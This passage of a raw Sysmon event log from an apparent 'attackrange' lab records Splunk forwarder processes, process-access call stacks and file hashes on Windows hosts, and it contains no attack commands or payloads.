Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F6A9EF61298A631E24A9F6CC9BE12FF,SHA256=B0E493AD94B52151E657BDA5D83DD1862D54EEE8A4D9FB396E357B5616AA3BB1,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046981Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:15.643{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50953-false10.0.1.12-8000- 10341000x8000000000000000806639Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:24.237{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F38C-60EB-5079-00000000D001}416C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806638Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:24.237{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806637Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:24.237{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806636Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:24.237{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806635Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:24.237{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806634Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:24.237{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806633Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:24.237{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806632Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:24.237{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806631Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:24.237{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806630Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:24.237{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806629Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:24.237{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F38C-60EB-5079-00000000D001}416C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806628Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:24.237{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F38C-60EB-5079-00000000D001}416C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806627Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:24.222{0C1E0330-F38C-60EB-5079-00000000D001}416C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001046983Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:25.935{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B95F4C1CCA7DCE879EF3EA0FFDDE9319,SHA256=4A18040E0336479AF79439CBC487FA3DF3317D3C7CA018FFBFB2F0BF29922B95,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806671Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:25.784{0C1E0330-F38D-60EB-5279-00000000D001}2688764C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806670Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:25.628{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F38D-60EB-5279-00000000D001}2688C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806669Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:25.612{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806668Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:25.612{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806667Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:25.612{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806666Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:25.612{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806665Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:25.612{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806664Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:25.612{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806663Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:25.612{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806662Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:25.612{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806661Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:25.612{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806660Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:25.612{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F38D-60EB-5279-00000000D001}2688C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806659Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:25.612{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F38D-60EB-5279-00000000D001}2688C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program 